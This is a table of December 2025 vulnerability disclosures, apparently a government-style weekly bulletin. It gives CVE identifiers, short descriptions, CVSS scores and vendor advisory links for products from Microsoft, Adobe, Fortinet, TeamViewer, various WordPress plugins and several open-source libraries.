| Microsoft--Windows 10 Version 1809 | Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Heap-based buffer overflow in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62454 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Message Queuing allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62455 | Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Out-of-bounds read in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62457 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62458 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62461 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62462 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62464 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Null pointer dereference in Windows Client-Side Caching (CSC) Service allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62466 | Windows Client-Side Caching Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Integer overflow or wraparound in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62467 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62469 | Microsoft Brokering File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62470 | Windows Common Log File System Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use of uninitialized resource in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62472 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62474 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability |
| Microsoft--Microsoft Office 2019 | Relative path traversal in Microsoft Office Access allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62552 | Microsoft Access Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62553 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7 | CVE-2025-62555 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62556 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62558 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62559 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62560 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62561 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62562 | Microsoft Outlook Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62563 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62564 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.3 | CVE-2025-62565 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62569 | Microsoft Brokering File System Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Improper access control in Windows Camera Frame Server Monitor allows an authorized attacker to disclose information locally. | 2025-12-09 | 7.1 | CVE-2025-62570 | Windows Camera Frame Server Monitor Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Installer allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62571 | Windows Installer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Application Information Services allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62572 | Application Information Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DirectX allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62573 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Fortinet--FortiWeb | A reliance on cookies without validation and integrity checking vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an unauthenticated attacker to execute arbitrary operations on the system via crafted HTTP or HTTPS requests carrying forged cookies, requiring prior knowledge of the FortiWeb serial number. | 2025-12-09 | 7.1 | CVE-2025-64447 | https://fortiguard.fortinet.com/psirt/FG-IR-25-945 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.5 | CVE-2025-64658 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64661 | Windows Shell Elevation of Privilege Vulnerability |
| Microsoft--Microsoft Exchange Server 2019 Cumulative Update 15 | Improper input validation in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network. | 2025-12-09 | 7.5 | CVE-2025-64666 | Microsoft Exchange Server Elevation of Privilege Vulnerability |
| Microsoft--Windows Admin Center | Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2025-12-11 | 7.8 | CVE-2025-64669 | Windows Admin Center Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64673 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64679 | Windows DWM Core Library Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64680 | Windows DWM Core Library Elevation of Privilege Vulnerability |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.8 | CVE-2025-64783 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive memory information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.1 | CVE-2025-64784 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue does not require user interaction. | 2025-12-09 | 7.8 | CVE-2025-64785 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.1 | CVE-2025-64893 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.8 | CVE-2025-64899 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior to V21. Improper input validation allows authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64986 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-Explorer-TachyonCore-CheckSimpleIoC instruction. Improper input validation allows authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64987 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-Nomad-GetCmContentLocations instruction prior to V19.2. Improper input validation allows authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64988 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-Explorer-TachyonCore-FindFileBySizeAndHash instruction prior to V21.1. Improper input validation allows authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64989 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| Windscribe--Windscribe for Linux Desktop App | A command injection vulnerability exists in Windscribe for Linux Desktop App that allows a local user who is a member of the windscribe group to execute arbitrary commands as root via the 'adapterName' parameter of the 'changeMTU' function. Fixed in Windscribe v2.18.3-alpha and v2.18.8. | 2025-12-10 | 7.8 | CVE-2025-65199 | url url url url url url |
| wearefrank--ladybug | Ladybug adds message-based debugging, unit, system, and regression testing to Java applications. Versions prior to 3.0-20251107.114628 contain the APIs /iaf/ladybug/api/report/{storage} and /iaf/ladybug/api/report/upload, which allow uploading gzip-compressed XML files with user-controllable content. The system deserializes these XML files, enabling attackers to achieve Remote Code Execution (RCE) by submitting carefully crafted XML payloads and thereby gain access to the target server. This issue is fixed in version 3.0-20251107.114628. | 2025-12-09 | 7 | CVE-2025-66214 | https://github.com/wearefrank/ladybug/security/advisories/GHSA-f9fh-r3cv-398f |
| Huawei--HarmonyOS | Race condition vulnerability in the network module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 7.1 | CVE-2025-66327 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.13 and below allow an unauthenticated attacker to disable CAPTCHA verification by abusing a client-controlled parameter. Because the server previously trusted this value without proper validation, CAPTCHA protections can be bypassed, enabling automated login attempts and significantly increasing the risk of account takeover (ATO). This issue is fixed in version 2.0.14. | 2025-12-09 | 7.5 | CVE-2025-66507 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-qmg5-v42x-qqhq https://github.com/1Panel-dev/1Panel/commit/ac43f00273be745f8d04b90b6e2b9c1a40ef7bca https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.14 |
| ImageMagick--ImageMagick | ImageMagick is a software suite to create, edit, compose, or convert bitmap images. In versions 7.1.2-9 and prior, the TIM (PSX TIM) image parser contains a critical integer overflow vulnerability in its ReadTIMImage function (coders/tim.c). The code reads width and height (16-bit values) from the file header and calculates image_size = 2 * width * height without checking for overflow. On 32-bit systems (or where size_t is 32-bit), this calculation can overflow if width and height are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via AcquireQuantumMemory and later operations relying on the dimensions can trigger an out of bounds read. This issue is fixed in version 7.1.2-10. | 2025-12-10 | 7.5 | CVE-2025-66628 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8 https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to directory traversal through the App.add_media_files() function, which allows a remote attacker to read arbitrary files on the server filesystem. This issue is fixed in version 3.4.0. | 2025-12-09 | 7.5 | CVE-2025-66645 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-hxp3-63hc-5366 https://github.com/zauberzeug/nicegui/commit/a1b89e2a24e1911a40389ace2153a37f4eea92a9 |
| Zoom Communications Inc.--Zoom Rooms | Protection Mechanism Failure of Software Downgrade in Zoom Rooms for Windows before 6.6.0 may allow an unauthenticated user to conduct an escalation of privilege via local access. | 2025-12-10 | 7.8 | CVE-2025-67460 | https://www.zoom.com/en/trust/security-bulletin/zsb-25050 |
| siyuan-note--siyuan | SiYuan is a self-hosted, open source personal knowledge management software. Versions 0.0.0-20251202123337-6ef83b42c7ce and below contain the function importZipMd, which is vulnerable to Zip Slip, allowing an authenticated user to overwrite files on the system. An authenticated user with access to the import functionality in notes is able to overwrite any file on the system, and can escalate to full code execution under some circumstances. A fix is planned for version 3.5.0. | 2025-12-09 | 7.8 | CVE-2025-67488 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-gqfv-g4v7-m366 https://github.com/siyuan-note/siyuan/blob/dae6158860cc704e353454565c96e874278c6f47/kernel/api/import.go#L190 |
| langchain-ai--langgraph | LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1. | 2025-12-10 | 7.3 | CVE-2025-67644 | https://github.com/langchain-ai/langgraph/security/advisories/GHSA-9rwj-6rc7-p77c https://github.com/langchain-ai/langgraph/commit/297242913f8ad2143ee3e2f72e67db0911d48e2a |
| shopware--shopware | Shopware is an open commerce platform. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 have a Reflected XSS vulnerability in AuthController.php. A request parameter from the login page URL is directly rendered within the Twig template of the Storefront login page without further processing or input validation. This allows direct code injection into the template via the URL parameter, waitTime, which lacks proper input validation. This issue is fixed in versions 6.6.10.10 and 6.7.5.1. | 2025-12-10 | 7.1 | CVE-2025-67648 | https://github.com/shopware/shopware/security/advisories/GHSA-6w82-v552-wjw2 https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58 |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, a single maliciously crafted HTTP request can block the server's event loop for an extended period, caused by the HTTPHeaders.add method. The function accumulates values using string concatenation when the same header name is repeated, causing a Denial of Service (DoS). Due to Python string immutability, each concatenation copies the entire string, resulting in O(n²) time complexity. The severity can vary from high if max_header_size has been increased from its default, to low if it has its default value of 64KB. This issue is fixed in version 6.5.3. | 2025-12-12 | 7.5 | CVE-2025-67725 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-c98p-7wgm-6p64 https://github.com/tornadoweb/tornado/commit/771472cfdaeebc0d89a9cc46e249f8891a6b29cd https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. Versions 6.5.2 and below use an inefficient algorithm when parsing parameters for HTTP header values, potentially causing a DoS. The _parseparam function in httputil.py is used to parse specific HTTP header values, such as those in multipart/form-data and repeatedly calls string.count() within a nested loop while processing quoted semicolons. If an attacker sends a request with a large number of maliciously crafted parameters in a Content-Disposition header, the server's CPU usage increases quadratically (O(n²)) during parsing. Due to Tornado's single event loop architecture, a single malicious request can cause the entire server to become unresponsive for an extended period. This issue is fixed in version 6.5.3. | 2025-12-12 | 7.5 | CVE-2025-67726 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-jhmp-mqwm-3gq8 https://github.com/tornadoweb/tornado/commit/771472cfdaeebc0d89a9cc46e249f8891a6b29cd https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| Meta--react-server-dom-parcel | It was found that the fix addressing CVE-2025-55184 in React Server Components was incomplete and does not prevent a denial of service attack in a specific case. React Server Components versions 19.0.2, 19.1.3 and 19.2.2 are affected, allowing unsafe deserialization of payloads from HTTP requests to Server Function endpoints. This can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served. | 2025-12-11 | 7.5 | CVE-2025-67779 | https://www.facebook.com/security/advisories/cve-2025-67779 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| JBL--Flip 5 | An unauthorised attacker within bluetooth range may use an improper validation during the BLE connection request to deadlock the affected devices. | 2025-12-10 | 6.5 | CVE-2024-2105 | https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0002.json https://certvde.com/en/advisories/VDE-2025-089 |
| Fortinet--FortiProxy | An insertion of sensitive information into log file vulnerability [CWE-532] in FortiOS 7.4.0 through 7.4.3, 7.2.0 through 7.2.7, 7.0 all versions; FortiProxy 7.4.0 through 7.4.3, 7.2.0 through 7.2.11; FortiPAM 1.4 all versions, 1.3 all versions, 1.2 all versions, 1.1 all versions, 1.0 all versions and FortiSRA 1.4 all versions may allow a read-only administrator to retrieve API tokens of other administrators via observing REST API logs, if REST API logging is enabled (non-default configuration). | 2025-12-09 | 6.3 | CVE-2024-47570 | https://fortiguard.fortinet.com/psirt/FG-IR-24-268 |
| themefusecom--Brizy Page Builder | The Brizy - Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.16 via the get_users() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including email addresses and hashed passwords of administrators. | 2025-12-13 | 6.5 | CVE-2025-0969 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5987ef13-15d6-4ecf-894c-f22c8726402b?source=cve https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/api.php#L961 https://wordpress.org/plugins/brizy/#developers https://plugins.trac.wordpress.org/changeset/3392844 |
| fernandobt--List category posts | The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the 'starting_with' parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-11 | 6.5 | CVE-2025-10163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/21708205-dd43-4b22-9151-bc6f882422cb?source=cve https://plugins.trac.wordpress.org/browser/list-category-posts/tags/0.91.0/include/lcp-parameters.php#L240 |
| Grassroots--DICOM (GDCM) | An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input, simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition. | 2025-12-12 | 6.6 | CVE-2025-11266 | https://github.com/malaterre/GDCM/releases/tag/v3.2.2 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-345-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsma-25-345-01.json |
| extendthemes--Colibri Page Builder | The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri_loop' shortcode in all versions up to, and including, 1.0.335 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-11376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38eaf4be-5083-46fe-b586-e4be190dc9cc?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377192%40colibri-page-builder&new=3377192%40colibri-page-builder&sfp_email=&sfph_mail= |
| jbrinley--Mailgun Subscriptions | The Mailgun Subscriptions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mailgun_subscription_form' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-11876 | https://www.wordfence.com/threat-intel/vulnerabilities/id/149e60cc-9612-4651-b02d-4b68a3533d36?source=cve https://plugins.trac.wordpress.org/browser/mailgun-subscriptions/tags/1.2.0/Mailgun_Subscriptions/Subscription_Form.php#L101 https://github.com/flightless/mailgun-subscriptions/pull/8/commits/a8b597e3a09f3a1b76436d09de434fd9bfe29f64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3413662%40mailgun-subscriptions&new=3413662%40mailgun-subscriptions&sfp_email=&sfph_mail= |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to bypass WebAuthn two-factor authentication by manipulating the session state under certain conditions. | 2025-12-11 | 6.8 | CVE-2025-11984 | GitLab Issue #577847 HackerOne Bug Bounty Report #3322714 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| f1logic--Social Media Auto Publish | The Social Media Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage parameter in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-13 | 6.1 | CVE-2025-12076 | https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae682a-c048-427c-abf8-3ecbccc9c95c?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412065%40social-media-auto-publish&new=3412065%40social-media-auto-publish&sfp_email=&sfph_mail= |
| f1logic--WP to LinkedIn Auto Publish | The WP to LinkedIn Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-13 | 6.1 | CVE-2025-12077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b680132a-f397-4636-98b2-bcd8c168e822?source=cve https://plugins.trac.wordpress.org/browser/linkedin-auto-publish/trunk/js/notice.js https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412103%40linkedin-auto-publish&new=3412103%40linkedin-auto-publish&sfp_email=&sfph_mail= |
| mahethekiller--Header Footer Script Adder Insert Code in Header, Body & Footer | The Header Footer Script Adder - Insert Code in Header, Body & Footer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the script adder present in posts in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-12109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cab034fd-4cf2-4253-bbcd-c8bb86325fa8?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388587%40header-and-footer-script-adder&new=3388587%40header-and-footer-script-adder&sfp_email=&sfph_mail= |
| wpvibes--Addon Elements for Elementor (formerly Elementor Addon Elements) | The Addon Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.14.3. This is due to insufficient input sanitization and output escaping on multiple widget parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via multiple widget parameters in pages that will execute whenever a user accesses an injected page. | 2025-12-14 | 6.4 | CVE-2025-12537 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94217d06-21c2-443d-ae2c-a2dbd65b7908?source=cve https://plugins.trac.wordpress.org/changeset/3415227/addon-elements-for-elementor-page-builder/trunk/assets/js/eae.js |
| sgcoskey--Simple post listing | The Simple post listing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_name' parameter in the postlist shortcode in all versions up to, and including, 0.2. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page via mouse interaction. | 2025-12-12 | 6.4 | CVE-2025-12650 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dfdebeab-89f6-49b8-a38f-de2a8df7a7e8?source=cve https://plugins.trac.wordpress.org/browser/simple-post-listing/tags/0.2/simple-post-listing.php#L77 |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (formerly 1E Client) - Content Distribution Service (NomadBranch.exe) prior to version 25.11 for Windows allows malicious actors to cause a denial of service (application crash) via a crafted command, resulting in service termination. | 2025-12-11 | 6.5 | CVE-2025-12687 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| wpdive--Better Addons for Elementor | The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-12830 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d714d740-d7e0-49fd-af08-b4a80c9d0599?source=cve https://wordpress.org/plugins/better-elementor-addons/ https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style1.php#L19 https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style2.php#L17 https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style5.php#L12 |
